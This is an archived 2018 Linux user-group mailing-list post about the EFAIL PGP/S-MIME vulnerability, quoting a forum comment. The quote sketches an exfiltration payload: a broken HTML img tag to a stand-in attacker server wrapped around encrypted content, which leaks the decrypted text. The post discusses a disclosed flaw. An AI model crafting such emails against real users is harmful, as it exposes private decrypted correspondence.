[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[ale] PGP hole: HTML decrypters bad, no security for you!

Subject: [ale] PGP hole: HTML decrypters bad, no security for you!
From: joey at joeykelly.net (Joey Kelly)
Date: Mon, 14 May 2018 09:22:49 -0500

>From some twit:

"The first of two (!) attacks does seem rather simple. Send email with
three MIME parts: 1. <img src="http://yourserver.com/ " 2. [PGP encrypted
content] 3. "> Mail client decrypts 2, concatenates three parts and does
lookup on the URL which you control."

https://forums.theregister.co.uk/forum/1/2018/05/14/pgp_s_mime_flaws_allow_plaintext_email_access/


-- 
Joey Kelly
Minister of the Gospel and Linux Consultant
http://joeykelly.net
504-239-6550

Follow-Ups:
- [ale] PGP hole: HTML decrypters bad, no security for you!
  - From: joey at joeykelly.net (Joey Kelly)
- [ale] PGP hole: HTML decrypters bad, no security for you!
  - From: joey at joeykelly.net (Joey Kelly)

Prev by Date: [ale] 24-port ethernet switch
Next by Date: [ale] PGP hole: HTML decrypters bad, no security for you!
Previous by thread: [ale] 24-port ethernet switch
Next by thread: [ale] PGP hole: HTML decrypters bad, no security for you!
Index(es):
- Date
- Thread